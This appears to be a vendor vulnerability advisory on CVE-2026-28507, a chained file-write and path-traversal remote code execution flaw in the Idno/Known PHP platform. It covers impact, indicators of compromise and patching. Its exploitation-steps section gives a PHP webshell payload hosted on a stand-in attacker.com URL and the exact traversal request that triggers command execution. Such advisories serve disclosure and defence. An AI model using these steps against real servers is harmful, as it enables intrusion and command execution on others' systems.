CVE-2026-28507: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-28507 is a remote code execution (RCE) vulnerability in Idno (also known as Known), an open-source social publishing platform. It affects all versions prior to 1.6.4 and is exploitable by chaining two weaknesses: an arbitrary PHP file write via WordPress import processing (SSRF + file write) and a local file inclusion via an unsanitized template name parameter. The vulnerability was published on March 6, 2026, and patched in version 1.6.4 released March 1, 2026. It carries a CVSS v3.1 base score of 7.2 (High) and a CVSS v4.0 base score of 8.6 (High) (GitHub Advisory, Red Hat CVE).

Technical details

The vulnerability is classified as CWE-78 (Improper Neutralization of Special Elements used in an OS Command). It involves two chained weaknesses in Idno/Core/Migration.php and Idno/Pages/Search/User.php. In the first stage, the importImagesFromBodyHTML() function fetches attacker-controlled URLs during WordPress WXR import, using basename($src) on the raw URL to construct a temp filename — allowing a .tpl.php extension — and a trivially bypassable hostname check (substr_count($src, 'wordpress.com')) that passes for any URL containing the string wordpress.com anywhere in the path. In the second stage, the user search endpoint at /search/users/ accepts a template GET parameter that is passed to draw() in Idno/Core/Bonita/Templates.php, where a regex sanitizer only strips a leading underscore prefix and does not block ../ path traversal sequences, allowing inclusion of any .tpl.php file reachable by the PHP process. The attacker holds the HTTP connection open to keep the temp file on disk during the exploitation window, then triggers its inclusion via the LFI to execute arbitrary OS commands as the web server user (GitHub Advisory).

Impact

Successful exploitation grants an attacker full OS-level code execution as the web server user (e.g., www-data), resulting in complete compromise of confidentiality, integrity, and availability of the affected Idno instance. An attacker can read all files accessible to the web server process, modify system data, and execute arbitrary commands, potentially enabling lateral movement within the hosting environment. No persistent artifact remains after exploitation, as the temp file is deleted once the attacker releases the held connection (GitHub Advisory).

Exploitability

A detailed proof-of-concept (PoC) is publicly documented in the GitHub Security Advisory, including sample WXR XML, a Python HTTP server script to hold the connection open, and the specific curl command to trigger RCE. Exploitation requires a web application admin account for the file write stage and any authenticated user account to trigger the LFI/RCE stage. There is no evidence of in-the-wild exploitation at this time, and the vulnerability is not listed in the CISA KEV catalog. The EPSS score is approximately 0.0045 (0.45%), indicating low current exploitation probability (GitHub Advisory, Red Hat CVE).

Exploitation steps

  1. Reconnaissance: Identify an internet-facing Idno instance running a version prior to 1.6.4. Confirm the Text plugin is enabled (default) and that allow_url_fopen is enabled in PHP (default).
  2. Prepare the attacker server: Host a PHP webshell file at a URL containing wordpress.com in the path with a .tpl.php extension, e.g., http://attacker.com/wordpress.com/shell.tpl.php. The file content should be a PHP payload such as <?php system($_GET['cmd']); ?>.
  3. Craft the WXR import file: Create a WordPress eXtended RSS (WXR) XML file with an <img> tag in a post body whose src attribute points to the attacker-controlled URL.
  4. Submit the import as admin: Log in as a web application admin and POST the WXR file to /admin/import/ with import_type=WordPress. The application responds immediately and runs the import in the background after a 10-second delay.
  5. Hold the connection open: The attacker's HTTP server sends the PHP payload and holds the TCP connection open (e.g., for 45 seconds), keeping the temp file on disk at /tmp/{md5(url)}{basename(url)} (e.g., /tmp/594ac6416712b71b978fa4659c4298c3shell.tpl.php).
  6. Trigger RCE via LFI: While the connection is held open, send a GET request as any authenticated user to the user search endpoint with a path traversal template parameter:
    GET /search/users/?query=a&limit=1&template=../../../../../../tmp/594ac6416712b71b978fa4659c4298c3shell&cmd=id
  7. Receive command output: The draw() method resolves the path, includes the PHP file, and executes the OS command. The output (e.g., uid=33(www-data)) is returned in the rendered field of the JSON response.
  8. Release the connection: Close the attacker server connection; file_put_contents returns, and the temp file is deleted, leaving no persistent artifact (GitHub Advisory).

Indicators of compromise

  • Network: Outbound HTTP connections from the Idno/web server process to external attacker-controlled hosts during WordPress import processing; inbound GET requests to /search/users/ with template parameters containing ../ sequences or long hex strings.
  • Logs: Web server access logs showing POST requests to /admin/import/ followed shortly by GET requests to /search/users/ with unusual template parameter values (e.g., ../../../../../../tmp/...); PHP error logs referencing unexpected file includes from /tmp/.
  • File System: Temporary .tpl.php files in the PHP temp directory (e.g., /tmp/ or systemd private temp mounts like /tmp/systemd-private-*-apache2.service-*/tmp/) with names matching the pattern {md5hash}{basename}.tpl.php; these files may be transient and deleted after exploitation.
  • Process: Unusual child processes spawned by the web server process (e.g., apache2, php-fpm) such as id, whoami, bash, curl, or wget with no legitimate administrative context (GitHub Advisory).

Mitigation and workarounds

The vendor has released version 1.6.4, which includes fixes for both the image import file write and template validation issues (commits in PR #3344 and #3345). All users running Idno prior to version 1.6.4 should upgrade immediately. As interim mitigations: restrict network access to Idno admin endpoints, disable allow_url_fopen in PHP if not required, and monitor for suspicious file write operations in the PHP temp directory and path traversal attempts in web server logs (GitHub Release, GitHub Advisory).

Community reactions

The vulnerability was reported by security researcher anuraagbaishya and published via GitHub's security advisory system by Idno maintainer benwerd on March 1, 2026. A brief technical write-up was published at infinitsec.net shortly after disclosure. The CVE was also tracked by Red Hat's security advisory system. No significant broader media coverage or notable community controversy has been identified (GitHub Advisory, Red Hat CVE).

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management